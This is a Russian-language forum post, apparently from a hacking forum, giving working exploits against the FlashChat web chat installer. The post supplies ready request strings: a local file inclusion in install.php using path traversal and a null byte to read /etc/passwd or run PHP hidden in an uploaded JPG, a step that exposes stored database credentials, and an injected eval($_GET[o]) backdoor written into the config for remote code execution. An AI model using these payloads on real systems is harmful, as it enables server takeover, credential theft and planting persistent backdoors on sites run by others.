Пришлось по работе поковыряться - слил эту версию и по-быстрому просмотрел только процесс инсталляции, так что это типа признания, что я вообще весь чат не смотрел, а только мельком.

1) LFI (need: magic_quotes=off)

Бажный файл: install.php

...
$step = $_GET['step'];

if( ! $step || $step<0 || $step>8)
{
$step = 1;
}

include "./install_files/step_$step.php";
...


В чате можно заливать свой фон для окна чата в формате JPG. Заливаем фон-картинку со своим пхп-кодом и он кладётся сюда: \images\cust_img\

Т.о. пример эксплоита выглядит так:
/install.php?step=/../../images/cust_img/5f_121171317514078.jpg%00

или так:

/install.php?step=/../../../../../../../../../etc/passwd%00

2) Conf read
Вот так читается уже прописанные данные для мускуля в конфиге:

/install.php?step=2

Смотрим сорец и видим пасс за звёздочками, юзера, бр и сервер.. ну всё как пологается вобщем.

3) Cod exec (need: magic_quotes=off)
Ну а тут основано на втором этапе. Конфиг этот можно переписать (если ест ьправа на запись. если их нет - чат выдаст предупреждение что нет прав). Т.о. идём:

/install.php?step=2

и в префикс ДОПИСЫВАЕМ следующее (т.е. то что там было - не стираем):

',); if (isset($_GET[o])) eval($_GET[o]); /*

После этого выполняем код вот так:
/inc/config.srv.php?o=[your_eval_code]

Про первый и второй пункт я писал на форуме
больше года назад (FlashChat some bugz (http://forum.antichat.ru/thread39296.html)). А способ с записью в конфиг интересный.

Поиск у нас знаете ли херово работает =)
Пускай модер раздела склеит топик со старым, чтобы было в одном.